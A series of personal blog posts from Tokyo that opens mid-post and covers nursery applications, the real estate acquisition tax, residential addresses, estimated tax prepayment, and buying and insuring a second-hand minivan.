So for now we will keep paying out-of-pocket and hope that our kid can continue to attend nursery after March. Then in a year, we will look for nursery for the second kid and my wife will look for work of 120 hours or more. There will be a bit of catch 22 here as well: we get points for the certified nursery application if she works, but she can’t start working until we find nursery.

And then we also want a third kid sometimes soon.

Summary

Overall it feels that the way the system is setup makes it difficult for mothers to work and have more than one child. The possible options that I can see are like this:

work for a good company where taking extended maternity leave even in short succession is accepted - we have a friend who had a baby 1.5 years ago, couldn’t find nursery so extended the leave for 2 years, and will have the second baby before that 2 years is up. She is on leave for 3-4 years minimum, but her company and colleagues are fine with it, so it works.
quit work and stay at home for at least a few years to look after the kids. Accept that this will make getting into nurseries harder.
have grandparents nearby that can provide childcare - this helps with not being able to get into nursery
balance freelance/contractor work with childcare and hope that the city hall staff will be supportive

At the end of the day it seems that the issue comes down to not having enough nursery spot available. This is what pushes the cities to prioritize the people in the most need of nurseries leading to the additional paperwork for non-regular workers.

Finding nursery in Japan

2025-09-20T00:00:00+00:00

We went through finding a nursery for our then 8 months old daughter last year, but I haven’t wrote about it yet, so here it goes.

Our situation

My daughter was half years old when we started looking for nursery for her. We were living in Mitaka City (Tokyo) at that time, but already bought land in the neighboring Musashino City, so we initially looked at nursery at both places, but later decided to focus on Musashino to avoid having to change nurseries after the move.

I work as a full-time employee (正社員), while my wife used to work as a freelancer then started her postgraduate studies before our daughter was born, and took a year off from the university when the kid was born. She had one semester left, so that’s why we wanted our kid to start nursery.

First step: city hall

We talked to both Mitaka and Musashino city halls, and they provided us with a list of nurseries in both cities, as well as a general explanation.

Types of nurseries

As far as I understood there were the following nursery types available. There were some others for smaller places that only accept kids under 3, but we didn’t really consider those.

認可保育園 (ninka) - Licensed Daycare Center

Approved by the local government under strict national standards (building size, number of staff, safety, hygiene, etc.). Sometimes run by the city (公立保育園) sometimes private (私立認可保育園), but mostly indistinguishable.

Applications are handled by the city hall using a point system, and is based on the need of the family: special circumstances (single parent, disability, medical conditions) get priority. Otherwise points come from how much the parents work (with full-time being the most points). You can specify the list of nurseries to apply to. Each month they check, and if a nursery has a place available, the person that applied there with the maximum point gets accepted.

Fees are determined by the city based on the income of the family with various subsidies (e.g. free from 3 years old nationwide), and in Tokyo it’s completely free from September 2025. Earlier it used to be between free to 72,800 yen for high earners (above 10 million yen yearly income or so), with the average payment around 28,250 yen.

There are not enough places in Tokyo, and it is common to have many times more applications than spots available. Likely due to this, it is treated a bit as a privilege rather than a service/business: it is common for nurseries to ask you to bring diapers for your kid, and also take home the used ones, and you just have to follow the rules like this. Also there are stories of parents that went shopping, then picked up their kids. And the nursery asked them that if they had time to go shopping, then they should pick up the kid earlier instead.

We checked but both Mitaka and Musashino had long wait lists, and also we would have lost a lot of points in Musashino, since officially we still lived in Mitaka and they give priority to their local residents. So in the end we decided to only apply after we move.

認可外保育 (ninkagai) - Unlicensed Daycare Facilities

Not formally licensed by the prefectural government, but still operating legally. They must notify local authorities and meet basic safety/hygiene rules, but standards are looser. In Tokyo, some get certified by the Tokyo government as 東京都認証保育所, which has higher standards than the default, but still not as high as the fully licensed.

Mostly privately run, and they operate as for-profit businesses.

Applications are handled by the place directly, and usually first-comes-first-served. Fees are also set by the place and usually don’t depend on the family income, though the Tokyo certification might set limits on the fee (I’m not fully sure).

International nurseries

Most of these don’t accept zero year old kids, but we checked the nearby MIST (Musashino International School Tokyo) and their kindergarden (from 3 years old) class costs about 2 million yen in the first year (slightly less later), which we found to be too expensive anyway.

企業内保育所 - Company nurseries

These are usually created by a company to help their own employees, e.g. I’ve heard about one that was in a hospital for the kids of the staff working there. Some will have contract with multiple companies, and we talked to one that would allow additional companies to join, but it seemed they would need my employer to pay them, which wasn’t really an option (I work for a company that’s too big for these type of deals).

If you employer has one, you likely already know, and otherwise these are likely not an option.

認証保育所 - Tokyo licensed nursery

As I mentioned above, these are licensed by Tokyo. Part of the requirement is a cap on the maximum monthly fee (80,000 yen/month under 3, 77,000 yen otherwise), and in exchange for this they receive subsidies both when being established as well as ongoing support (source1, source2).

Applications are handled by the nurseries directly, however (as we learned recently) because of the subsidy, the city hall might still require parents to fulfill some requirements. For example both Mitaka and Musashino require the need for a nursery (so parents have to work at least part time), but it seems Mitaka is much more relaxed about this than Musashino.

Musashino has a website that lists all nurseries with the available spots, and this is where we found ours. Interestingly while the nursery is in Musashino, since we live in Mitaka, the Mitaka city hall pays the nursery, so we had to fulfill the requirements set by Mitaka.

Application and fees

We applied and got accepted to one of the Tokyo-certified nurseries of Musashino, that is part of the Poppins Nurseries chain. After filling out the application form, there was an interview (of the parents, not the baby) but it was mostly an explanation session to ensure we knew how everything worked.

We started out in the 6 hours/day (9am-3pm), 5 days/week plan for 60,000 yen per month, then later switched to the 8 hours/day (9am-5pm) for 72,000 yen per month.

Since they run as a private business they offer additional services: normally you need to bring diapers and towels, but for an additional 3,900 yen per month for diapers and 1,800 yen for towels they will provide them. We signed up for both.

Getting used to the nursery

Our daughter was about 8 months old when she started going to nursery. They have a system where kids start with a short amount of time (maybe initially 30 minutes, then 1-2 hours) for a few days, then gradually increase the time. Under 1 year most kids still mainly drink milk or formula, so it is vital that they accept it in the nursery.

Our kid stopped crying after a few days, but refused to drink there. This meant that they could only keep her for 2 hours (since kids at her age have to drink every 3 hours), so we brought her at 9am then picked her up at 11am for almost a month. We tried to give her morning formula earlier, hoping to make her hungry, but she likely realized that we will pick her up soon, so she kept refusing the bottle in the nursery. We even bought the same bottle that the nursery was using, but she was fine with it at home.

The nursery tried their best to help, and even let my wife go in once and feed her from the bottle she just rejected, and she drunk it all. But still, next day she refused it from the nursery teacher.

After over a month of picking her up at 11am, she decided that actually the nursery was a good place, and she drunk the whole bottle, and kept drinking every day from that point on. She is just a stubborn little girl.

Since then she loves the nursery, always happy to arrive, and also happy to see us when we go to pick her up.

Since the nursery is closer to the new house, it takes either 30 minutes by bus and train, 45 minutes by walk or a 15 minute bike ride, so we bought an electric assisted bike and have been using that to bring her to the nursery:

I can highly recommend this. We ended up getting the more expensive version that comes with a radio key, so if you turn on the bike while the key is in your pocket, it will unlock itself (similar to how cars work). This is super helpful especially when taking care of a toddler.

Real estate acquisition tax in Japan (不動産取得税)

2025-09-06T00:00:00+00:00

We bought a land in Tokyo in May last year and are currently building a house. A few weeks ago (about 1 year 3 months since buying the land) I received a letter from the Tokyo tax office titled 不動産取得税の申告, Real estate acquisition tax return. But I’m already paying property tax (固定資産税) to my local city every year, so what’s this then?

Real estate acquisition tax return

The letter I got was asking me to file a real estate acquisition tax return (不動産取得税の申告) within about 3 weeks (deadline: September 16). It also included the estimated tax amount to pay: 285,300 yen

The calculation showed the following:

assessed value of the land: 19,021,657 yen
tax basis: 9,510,000 yen (if the land is used for residential house, then this is half the value of the land)
tax to pay: 285,300 yen (3% of the tax basis)

But the letter also told me to not pay yet, as there are multiple reductions and exemptions. So they were only asking me to file the details (e.g. whether I’m building a house, whether that will be residential or commercial, and if I’m eligible for any other deductions), and then they will send me the final bill to pay at a later time.

Real estate acquisition tax

Tokyo’s tax office has a great website on the topic.

The real estate acquisition tax (不動産取得税) is a one-time tax levied at the time when someone acquires a real estate (e.g. buys a land or house, but also if receives it as a gift even from family). It is paid to the prefecture (so Tokyo, in my case), unlike the yearly property tax (固定資産税) which is paid to the city (Musashino City in my case).

Amount: 3% of the the assessed value of the property (固定資産税評価額, not the actual purchase price) for residential land and houses (4% for commercial)

Reductions / exemptions: there are numerous reductions and exemptions, and most people end up paying nothing or only a small amount

Reporting requirement: if the ownership change is registered within 30 days (ownership transfer registration, 所有権移転登記) then the Legal Affairs Bureau (法務局) will automatically notify the tax office, and no reporting is required. This covers most people buying a place. Otherwise the buyer must notify the tax office within 30 days

Tokyo Zero Emission -> full exemption

To improve the energy efficiency of houses, Tokyo is running their zero emission certification program (東京ゼロエミ住宅) that provides subsidies and various discounts. It has 3 levels (水準A, 水準B, 水準C) with A being the best. Our house got 水準A (Ichijo just handled this, so it is likely that all of their houses get this).

Based on the Tokyo tax office website the 3 levels receive the following reductions from the real estate acquisition tax:

水準A: 100% reduction (full exemption)
水準B: 80% reduction
水準C: 50% reduction

Since our house is 水準A, we will get full exemption (due to this I didn’t look into other exemptions or reductions, but there are quite a few).

The explanation pdf list the following documents as required attachments:

Tokyo Zero-Emission Housing Certification (東京ゼロエミ住宅認証書)
Tokyo Zero-Emission Housing Design Confirmation (東京ゼロエミ住宅設計確認書)
(For apartment buildings with different standards) Tokyo Zero-Emission Housing Construction Completion Inspection Application Form (（異なる水準の住戸を有する共同住宅の場合）東京ゼロエミ住宅工事完了検査申請書)

We already received the Tokyo Zero-Emission Housing Design Confirmation (東京ゼロエミ住宅設計確認書) as that was based on the house design, but the Tokyo Zero-Emission Housing Certification (東京ゼロエミ住宅認証書) will only be issued after the house is ready.

Submitting the tax return

So we called the tax office and they told us to return the tax return with the current information (we are building a house, expected to be ready by November, expected to have zero-emi 水準A), then in November once we have the Tokyo Zero-Emission Housing Certification (東京ゼロエミ住宅認証書), then apply for the full exemption. They also told us that essentially as long as the header of the filing is correct (my name, land address), the rest is fine to have some mistakes, since they will finalize it once the house is built.

Submitting the exemption application

A few weeks after the house was ready we got the Tokyo Zero-Emission Housing Certification (東京ゼロエミ住宅認証書), so we filled out the exemption request form (不動産取得税減免申請書) and sent it to the tax office. They should only contact us if there is some issue, so hopefully this is the end of this story.

Getting a new address for our home

2025-09-06T00:00:00+00:00

We are building our house in Tokyo. Previously there was an old house on this land with a garden. That house was taken down and the land got split into two (very common in Tokyo). Somehow the other land got to keep the original address, which meant we had to get a new one.

Addresses in Japan

Addresses in Japan are not based on the street name and number (like in some other countries) but rather on smaller and smaller sections of the city.

An address might look like this (I made it up):

東京都武蔵野市緑山2丁目15番8号 Tokyo, Musashino City, Midoriyama 2-15-8

Splitting this up:

Tokyo is the prefecture
Musashino City is the city
Midoriyama is the chō (町), the neighborhood. There are 13 neighborhoods in Musashino City
2丁目 (chōme / numbered sub-neighborhood) are a numbered area within the neighborhood. One neighborhood can have anywhere between 1 to 8+ chōme, but in Musashino it is usually from 3 to 5
15番 - block number
8号 - building number

Here is a map of Musashino with the neighborhoods and the sub-neighborhoods (source):

These are the general addresses used on most documents and for sending mail. The official name for it is residential address system (住居表示), but most people wouldn’t even be aware that it has a name or that it is not the only address system.

Lot-number address system

There is another, address system, the lot number addresses: 地番 (jiban), sometimes called 土地番地 (tochi banchi). This is based on the land lot numbers in the official register (登記簿). It might look like this:

東京都武蔵野市緑山2丁目1234番56 Tokyo, Musashino City, Midoriyama 1234-56

Since all land is in the register, it seems that all land has this.

Our process

When we started building our house, it didn’t have a usual address (since our neighbor got the previous one), so all of our documents used the lot-number address.

About halfway through the construction (and one month after the house was standing) Ichijo applied at the city to get us a new address, and a bit later we got a notification that our address was decided (住居表示通知書). This also included a metal address plate that shows the new address, that we will attach at the front so that people can see the new address.

We actually got lucky, since apparently our neighbor’s number was the highest in this block, so they could just increase it by one. E.g. if our neighbor was 2-15-8 then our address became 2-15-9. There was a chance that 2-15-9 would have already been taken and then we could have ended up with something like 2-15-17 which could confuse delivery drivers if it is far from 16.

After getting the address

There doesn’t seem to be too much to do after getting the address, we just started using it on all new documents (currently working on home insurance, and there were some extra tax-related documents too, but I’ll write about those separately). There doesn’t seem to be any need to update the earlier documents that used the other address. My guess that this is due to how the system works: it is not that the address of our land changed, but rather that all lands have 2 addresses (one in each system) and we simply used the address from the other system.

I did however check our new address on Google Maps and made an edit to make it point to the correct house (somehow Google Maps guessed the location, and it was off by a few blocks).

Estimated tax prepayment system (予定納税)

2025-08-27T00:00:00+00:00

On July 31st my bank account had a direct debit charge of 52,900 yen with the note シンコクシヨトクゼイ. This is how I learned about the estimated tax prepayment system.

Background

As a salaried employee my company mostly handles my taxes. I have some investments in an Interactive Brokers account where tax is not withheld, and I have ETFs and stocks there that pay some dividend, so I still need to file tax in February to declare those and pay the tax. Since dividends from US securities get taxed 10% in the US, I can claim foreign tax credit and pay only another 10% tax in Japan. This usually comes out to about 20-30,000 yen tax to pay, and I have been paying that in February each year.

However last year I did a rebalance in the investment account (sold some ETFs and bought another one), which meant I realized 1.2 million yen gains, which meant I was on the hook for 240,000 yen capital gains tax. Moreover dividends were also higher than usual, resulting in an additional 38,000 yen tax from that. I paid these in February and didn’t think of it more. But the NTA thought differently.

Pay your taxes early

If based on last year’s income the tax office estimates that you will have 150,000 yen or more tax to pay, then they will charge 1/3 of it in July (first installment, 第１期分) and 1/3 of it in November (second installment, 第２期分).

If your income is expected to be less than last year, then you can ask for an exemption, but since I wasn’t charged that much, I decided to just go ahead with it.

At tax filing time, I will need to include this and it will be used to offset any outstanding tax obligation, and the rest will be refunded. So it is not an extra tax, simply a prepayment.

How they arrived to the 52,900 yen amount that I was charged, I’m not sure. Based on the extra tax I had to pay last year, I would have expected it to be more, but I won’t complain.

Online notification

I actually got very lucky that I had my bank account’s direct debit configured with the tax office. During tax filing there was a section to ask for electronic delivery of the estimated tax amount notice that I likely selected, which meant I didn’t get any paper notification:

なお、令和６年分の所得税及び復興特別所得税の確定申告において、予定納税額の通知書の「電子交付」を希望した方については、予定納税額の通知書を書面の送付に代えてe-Taxにより通知しています。

However electronic notification is not an email, but rather a notification in e-Tax, which I totally missed. So should I not have had the direct debit configured, I would have had a late tax payment. Yikes.

This reddit answer has the steps to check the e-Tax notifications:

login to https://myna.go.jp and to go to the message box お知らせ at the top right of the page
There you should have a message titled 【税務署からのお知らせ】予定納税等通知書に関するお知らせ from June
Open it and click the link e-Taxメッセージボックスへ
That will have a button to pay directly from your bank account or via credit card

I also had the message there informing me of the amount that was later taken. A message that I totally missed.

Source

NTA’s Don’t forget to pay your first installment of estimated income tax site

Our timeline of getting a second-hand car in Japan

2025-08-14T00:00:00+00:00

We recently bought a second-hand minivan from a Toyota dealership and in this post I’ll share our timeline. Each section will start with the time remaining until we got the car.

General

In Japan when you buy a second hand car, it usually takes up to a month until you can drive it home. I encountered two reasons for this:

1. Shaken (mandatory vehicle inspection) - many people will sell their cars right before it comes up for shaken, and then the dealership will wait with the shaken until someone buys it. So once you sign the contract for the car, only then will the dealership do the shaken. The cost of this is included in the price, and this is actually nice as you will have the full 2 years until the next shaken.

2. Parking certificate - in Tokyo and other major cities, to register a car in your name, you need a certificate from the police showing that you have a parking space big enough for that specific car. This document needs to include the chassis number (車台番号) of the specific car, which means the only possible timeline is something like this:

Find a car that you like, sign the contract to buy it
Go to police, get the parking certificate for that specific car (takes a few days)
Give the parking certificate to the dealer (or let them handle it entire for a fee)
The dealer completes the shaken, if needed
The dealer registers the car in your name
You get the car

Our timeline

Now let’s see how our timeline went.

1 year before: started looking

We decided to get a car, and started looking at various sizes and models. Anytime we would rent a car, we chose one that we could imagine buying, then discussed how it was.

Half year before: checking prices

Once we had some models in mind, we checked prices of new and few years old models, trying to figure out what age/milage combination gives the best cost-performance.

2 months before: visiting dealerships

We visited a nearby Toyota dealership first, then 3 weeks later a Honda one. At this time we were still figuring out the right size for the car to get.

4 weeks before: checking online listings

As we were narrowing down the models we were interested in, and decided the options we wanted (second row AC, double electric sliding doors, parking radar and camera, cruise control, etc.), we could start looking at the online listings near us. We searched across Tokyo, Chiba, Kanagawa, and Saitama, with the thinking that we can go there on a weekend.

3 weeks before: finding the car

Based on the listings, my wife found a car that seemed like a perfect fit, and called the dealership to make a reservation. They told us that they can’t hold it for multiple days, but if we call them in the morning, they will keep it for us until we visit later that day.

We went there, and checked the car (already prepared specific things we wanted to know). We could even drive the car around the parking lot a bit, but not in traffic (this car had shaken, so that wasn’t the issue, so my guess is they don’t have an insurance for a longer test drive).

We decided to buy it, and went through the paperwork. We arrived at 10:40am, decided to get it around 11:30am, and finished the paperwork by 1:30pm.

We paid 10,000 yen in cash this time, and were told to transfer the rest of the money within a few days.

We were told that it will take about a month to get the car, especially as 3 weeks from today Obon will start, and the company will close for a full week. So we decided to speed things up and try to get it before Obon.

2.5 weeks before: paying for the car

A few days after signing the contract I sent the price of the car (minus the 10,000 yen) via bank transfer.

2 weeks before: finalized the parking

We checked earlier if our mansion had available parking, but only rented it now. They were pretty fast and we could get the keys in a week. They also provided the papers to give to the police for the parking certificate.

1.5 weeks before: apply for the parking certificate (車庫証明書)

The dealership offered to do this for us, but they would have charged us 18,700 yen for it, and it would have taken longer, so we decided to do it ourselves. The dealership provided us with the form, and prefilled the car specific details (chassis number, size), so we just had to attach the papers about the parking place (from the building management company), and bring it to the police station.

They told us to come back in 3 days for the certificate.

1 week before: picking up the parking certificate

Picked up the parking certificate at the police station and mailed it to the dealership.

2 days before: the car is ready

2 days before picking up the car, the dealership called us that the car was ready to be picked up. They also sent us the shaken certificate (車検証明書). We needed this to finalize the insurance, so this was nice.

On the day

Some final paperwork and explanation, and I got the keys to the car. A minor surprise was that the tank was only about 25% full, so I needed to fill it up myself.

Car insurance in Japan

2025-08-03T00:00:00+00:00

We recently bought a second-hand minivan and in this post I’ll describe what I learned about car insurance, and our experience signing up for one.

Mandatory car insurance (自賠責保険 - Jibaiseki Hoken)

All vehicles must have it, the price and coverage is set by the law (and doesn’t depend on the driver), it is renewed at shaken (vehicle inspection). As of 2025 it costs 17,650 yen for 2 years for regular cars and a bit less for kei-cars and motorcycles (source).

Multiple insurance companies offer it, but since the price and coverage is the same, it doesn’t really matter which one to choose. The car we bought still has one year until the next shaken, so this is taken care of until then.

It has some serious limitations though (source):

Only covers the other party, not the driver or passengers of the insured vehicle
Only covers injuries or death, but not damages to property or vehicles
It has pretty low limits (all limits are per injured person):
- Injury: up to 1.2m yen (120万円)
- Death: up to 30m yen (3,000万円)
- Permanent disability: up to 40m yen (4,000万円)

If someone causes an accident, they will be liable for all other expenses, like damages to the other car(s) or buildings, medical expenses and death above the mandatory limits, and all costs associated with their passengers’ and their own recovery. Thus having an additional, optional insurance to cover these is highly recommended, and about 90% of drivers have one.

Optional insurance (任意保険 - Nini Hoken)

As we saw above, this is highly recommended, so when people talk about car insurance in Japan, they usually mean this. Multiple insurance companies offer packages with various coverage, so there are a lot of options here.

Major things to decide:

who will be the main driver? - this can be different than the owner of the car, and the insurance gets cheaper if the main driver has a gold license
who will drive the car? - main driver, main driver and spouse, anybody. The price of insurance gets higher with more people included. Since the insurance is optional, even if someone is not included, they are still allowed to drive the car, but the insurance won’t cover that trip. To counter this, one can take out a 1-day insurance (1日自動車保険) for that day, available for a few hundred yens at e.g. Lawson. So unless you know for sure that others will drive, it is likely better to limit it to the driver (and spouse).
do you want coverage for yourself and passengers, or only the other parties? - cost of the other parties can definitely bankrupt you, but whether you want insurance to cover your own medical costs is more of a personal preference
do you want coverage for your own car or only the others’? - one might decide to just pay for any damages out of pocket. This can save up to half the cost of insurance, so worth considering
do you want roadside assistance? - if your car breaks down (flat tire, dead battery, out of fuel, stuck in snow, etc.), the insurance company will send someone to help you. JAF offers this as a separate service for 6,000 yen per year (or as pay-as-you-go), so that’s a good comparison.

At the end of the day insurance is a negative sum game: on average we are expected to pay more for insurance than what we will get from it (otherwise insurance companies would go bankrupt). So there is an argument for only getting coverage for catastrophic events (e.g. being on the hook to pay enormous medical costs of someone else, or the price of someone’s luxury car), while skipping insurance on the more manageable disasters (e.g. fixing your own car if you hit a utility pole).

In the end we chose the followings:

main driver: my wife. We plan to both drive, and since she has a gold license, this saves on the insurance
who will drive: main driver and spouse
coverage for driver and passengers: yes (it ended up being pretty cheap (6,290 yen per year), and nice to not have to worry about it)
coverage for our own car: we thought a lot about this, and decided to get a limited coverage for the first year (with high, 100,000 yen deductible). I expect that we will skip on this from the second year onwards
roadside assistance: initially decided to skip and just pay for JAF if we need it (they charge 20-30,000 yen per event, so it’s not so bad), but in the end it got included for free

Dealership

The dealership one buys their car can handle the insurance for you. This is likely the easiest, but the cost will probably by higher than other options. We passed on this, and decided to do it ourselves.

Corporate discount

Because of my employer I’m eligible for a 31.5% discount at Mitsui Sumitomo’s Insurance (三井住友海上火災保険株式会社 - don’t ask me if they are the same as the SMBC bank). Going through their quick estimation website I got a ¥82,440 yearly fee for the above conditions.

Kakaku.com

価格.com is a well-known price comparison website, and they have a page for car insurance. An insurance quote has many unique inputs (age, model, milage of the car, driver details), so you won’t be able to get estimates immediately on the site, but instead need to fill out all your details (including your contact information) and then the insurance companies will e-mail and/or mail you their quotes in the next few days. The process was pretty easy, and apart from a few reminders in the first week they didn’t send me any spam, so it was fine to give them my details.

Here are the yearly fees per insurance provider that we got (ordered by fee):

Company	Yearly fee
AXA DIRECT	¥40,200
Zurich	¥42,770
Mitsui Direct	¥48,230
SONY	¥63,180
SBI	¥66,920
E.design	¥68,022
Rakuten	¥75,070
SOMPO	¥78,170
Mitsumori (Corporate discount)	¥82,440

So looks like the 35% off corporate discount ended up being the worse, however that estimate is from the insurance company’s website directly. Meanwhile the others are from the first estimate the companies sent me based on my input on kakaku.com, so the final price would likely be higher after checking their fine-print and adding extra things.

AXA DIRECT

I decided to continue with AXA DIRECT, as they were the cheapest and they had good reviews online. After signing up on their website from the email they sent me, I got to confirm the data I entered on kakaku.com (it was all there, but I could modify it if I wanted to), then I got to the coverage configuration page.

I really liked how AXA designed this page: it was separated into sections (like Compensation for the other party in an accident, Compensation for yourself and your passengers, Compensation for your own vehicle, etc.). Each section showed how much it contributed to the fee, and I could adjust any part of the coverage and have it recalculate the fee.

Moreover if anything was unclear, there was always a more details button explaining each term and coverage, and if even that wasn’t clear enough, there was a further details page giving specific examples for each line of the coverage. It was really nice to be able to drill down until we fully understood it.

In the end we made a few adjustments:

made the medical expenses coverage unlimited for us and our passengers (only a slight increase)
limited the coverage for our own vehicle - by excluding hit&run, hitting utility poles, hitting bicycles, and increasing our deductible to 100,000 yen. This saved us about 10,000 yen
we added coverage for legal fees - this was based on a colleague’s recommendation, as they had a bad experience crashing with someone who didn’t have insurance and wasn’t cooperative, and then suing them is the only way forward. It added 8,263 yen to the fee

Also we learned that AXA’s base rate includes the roadside assistance service (and can’t be removed), so we are also getting that which is nice.

In the end this left us with a yearly insurance fee of 40,750 yen, which I’m pretty happy with. We will probably revisit the coverage next year, but until then this is a good deal, I think.

Once the dealer completed the paperwork for our car and sent us the 車検書 (shakensho), we input the details from that (chassis number, license plate), and finalized the insurance contract on their website. As the last step we paid by credit card (we paid the full year at once, as paying it monthly would be 10% more expensive).

The overall process was easy and clear, and this is one more reason I liked AXA. Comparing it to Mitsumori (where I had the corporate discount): while they had the easy estimate website, the next step was to call them and based on other’s experience, the call usually takes an hour.

Friend referral

AXA has a friend referral program (ご家族・お友達ご紹介プログラムとお客さまページ複数契約割引) that gives 1,000 yen discount to both you and me, if you sign-up using my code. Start the sign-up from this link or use my referral code directly: M2023066040235.

Caring for the land: from buying it until the construction starts

2025-07-27T00:00:00+00:00

We are currently building our home in Tokyo. I wrote about our process and the costs associated with buying the land and the process of designing our house, and in this post I’ll describe how we cared for the land from the time we bought it to the time construction started.

To protect the actual location of our house, I will be using photos of other lands in this post.

May 2024: buying the land

As detailed in my other post, in mid May of 2024. we closed on the land, and became the official owners of the plot. The seller already cleared off the old house and built a fence towards the neighbors, so the land looked something like this:

This is ready for the house to be built. Except this was the time we could finally start designing the house, and construction was to start only 9 months later the earliest (and ended up starting 12 months later due to us taking our time with the design).

July 2024: nature takes over

June is the rainy season in Japan, which nature loves. In mere 2 month of time our land looked like this:

It was becoming higher than people, and our Ichijo guy asked us to do something about it (cut it and then cover the land with an anti-weed sheet), so that it doesn’t become a jungle by next year.

August 2024: anti-weed sheet

We considered cutting the grass ourselves, but buying the tools and figuring out the disposal would have been a challenge, so we hired a company to take care of it. We paid 97,350 yen for cutting the grass and covering the land with an anti-weed sheet (防草シート).

This was the state of the land for the next 8 months or so.

May 2025: removing the sheet

Ichijo asked us to have the sheet removed by 2 weeks before the construction start. Most house makers will take care of this, but apparently Ichijo has their processes streamlined so much, that they ask for an empty land.

We could have hired a company to remove the sheets, but we decided to do it ourselves. It took only a few hours, including pulling out the weed that has grown out in the gaps at the edge and between the sheets.

We called the garbage collection company in the city we currently live (Mitaka) and they told us that as long as the sheets don’t contain too much soil, they can be thrown away as burnable trash. So we bagged the sheets up, carried them home on bicycle, and threw them away. I was a bit concerned if our building’s maintenance guy would complain (as he is pretty strict with trash), but he didn’t say anything.

May 2025: ceremony and final check

A week before construction start we visited the land for 2 things: the ground-breaking ceremony and the ground rope marking confirmation.

Ground breaking ceremony (地神祭)

This is a traditional Shinto ceremony that involves a priest coming to the land to ask the gods of the land for safe construction and the prosperity of the building. It is completely optional, and when I asked Ichijo if their constructions workers cared about having it performed (since the safe construction part affects them), I was told that they don’t care.

Ichijo offers to help organize it (for a fee of 50,000 yen or so), but in that case the priest would come from some shrine in central Tokyo (that Ichijo has a relationship with). I wanted to do the ceremony with the local shrine since we are moving into the area. Ichijo told us that this is fine, however warned that some smaller shrines will ask the house builder to prepare some of the things for the ceremony, and Ichijo can’t help with that. Luckily our local shrine could handle everything for an overall fee of 45,000 yen.

The ceremony took about an hour. The priest was chill and explained what was happening (the prayers are in old Japanese, that most people don’t understand). Part of the ceremony was to symbolically start the construction: the Ichijo guy cut a few pieces of grass (put there intentionally for this), then I got to make the first mark on the ground.

During the ceremony the priest offered various food and sake to the gods. At the end of the ceremony, we were to drink the sake, which ended up being mainly ceremonial: both the priest and the Ichijo guy came by car and my wife is pregnant, so they only pretended to take a snip, then poured the rest on the ground. The priest also gave us all the vegetables that were offered to the gods and told us that we can eat it later. (It took us a few days to cook and eat them all.)

After the ceremony I asked which god did he pray for, and he told us that there were actually 6 gods involved today: some general gods known for constructions/houses, gods specific to this area (he looked up the gods for this land based on the address), and gods of his shrine (which are apparently different than the gods of the land, even though it’s a nearby shrine).

Overall it was a fun experience, and I can recommend it. As with everything related to Shinto, it is more of a tradition rather than a religion, and most Japanese people would claim they don’t believe in it, but yet still do it.

Before and during the second Word War, the Japanese government used Shinto to support its war efforts. To prevent this in the future, the constitution (written after the war) implemented strong separation of the state and religion, making it illegal for e.g. the state to give money to any religion. That’s how the Tsu Groundbreaking Ceremony Case came about: city officials paid for a groundbreaking ceremony on a municipal gymnasium construction, then city council members sued them claiming it to be unconstitutional. The cases ended up going up to the supreme court that in 1977 ruled:

Although it cannot be denied that this groundbreaking ceremony is related to religion, its purpose is purely secular — to pray for the peace and stability of the land and the safety of the construction work upon commencement, and to conduct a ritual in accordance with general social customs. Therefore, its effect is not considered to support, promote, or encourage Shinto, nor to oppress or interfere with other religions. Accordingly, it is reasonable to interpret that it does not constitute a religious activity prohibited under Article 20, Paragraph 3 of the Constitution.

So there you have it, it is officially a non-religious social custom.

Btw Woven City, the smart city Toyota is building, also had the same ceremony performed.

Ground rope marking (地縄張り)

On the same day as the ground breaking ceremony, we also got to check the ground rope marking. This is a simple rope installed a day earlier by Ichijo to show the location of the house. After checking that the distance from the sides of the land is as planned, we signed a document to confirm this.

I like that this check exists, just to ensure there is no misunderstanding about the location and size of the house. It also feels good that while there is very little I can contribute to the actual construction of the house, double-checking the location is at least something I can do myself.

June 2025: construction begins

Then in June 2025 the construction began. But details of that is for a different post.

The price of a second-hand car in Japan

2025-07-22T00:00:00+00:00

So we recently bought a second-hand minivan. I thought the price of the car will be simple: there might be some negotiation, but otherwise it should be a simple number, right? Well, it’s more complicated.

Looking at a listing, it already has two prices:

In this case the listing says:

車両価格 (vehicle price): 239万円 (2.39M yen)
諸費用 (other charges): 10.2万円 (102,000 yen)
支払総額 (total payment): 249.2万円 (2,492,000 yen)

So you’d expect to pay the “total payment” number, right? Except when we called them, the store sent us the following estimate:

It seems that the total payment listed on the website is the absolute minimum that you have to pay to drive the car off. In reality there are various additional fees for services that the dealership recommends (and most people take), so they include them in the first estimate. Some of these services make sense (e.g. setting up the ETC card reader), some can be skipped (e.g. getting a license plate with a number of your choice), and some are pretty expensive: the majority of that 170k charge is a 152,200 yen coating.

Sidenote: we also got a quote for a Honda Freed where the price went from 2,339,000 yen (total payment) to 2,732,290 yen, so the Voxy was pretty good.

In the end we dropped the coating (152,200 yen), the custom license plate (6,930 yen), the garage certificate handling (18,700 yen) - this is to ask the police to come and confirm that you have a parking spot (but our police is pretty close, so we can just ask them ourselves).

The one extra thing that we added was a set of new tires: generally tires are replaced every 5 years, so our car still had the original tires. The sales guy said that it is likely enough to replace them next year at shaken(the mandatory vehicle inspection done every 2 years), but there were some small cuts on them. Also these are summer tires, and not suitable for ski trips. So we decided to have them replaced now, and got new four-season tires for 130,000 yen (which was actually the most expensive tire they had on the list, but the cheapest one was still 110,000 yen).

We also tried to negotiate, but the sales guy said that the price is fixed, and wouldn’t budge even on the options (although the options were already pretty minimal). We also asked if they could include the next shaken (the mandatory vehicle inspection done every 2 years), as it is coming up a year from now (August 2026), but he also said no to that. (They usually charge 100-150k yen for that, so would have been a good deal to have it included.) The only place he gave us a discount was the tire, where he dropped the installation fee (normally 13,000 yen).

So with all of this, in the end we are paying 2,602,620 yen for the car. For a 4 year old minivan with 22k km on the clock with no accident history, I think we got a pretty good deal.

How to buy a second-hand car in Japan?

2025-07-21T00:00:00+00:00

So we recently bought a second-hand minivan, and in this post I’ll cover the various options on how one might buy a second-hand car in Japan. (This is based on my limited research, so I could have missed somethings. Feel free to correct me in the comments.)

Auctions

I didn’t look into this in detail, but apparently this is one of the cheapest way to get a second hand car. But you need to know a lot about cars.

Friends, Facebook Marketplaces, Jimoty, Mercari

Finding a car this way is still on the cheaper side, as you are buying it directly from the previous owner. But this also means that you have to check the conditions of the car yourself, and do all the paperwork. But at least you can see the previous owner (unlike the auctions).

Some of these (e.g. Mercari) will charge a fee, and usually provide some service (e.g. conflict resolution). Others (like Facebook Marketplaces) only serve to connect the seller and the buyer, and don’t help with anything else (but they are usually free to use).

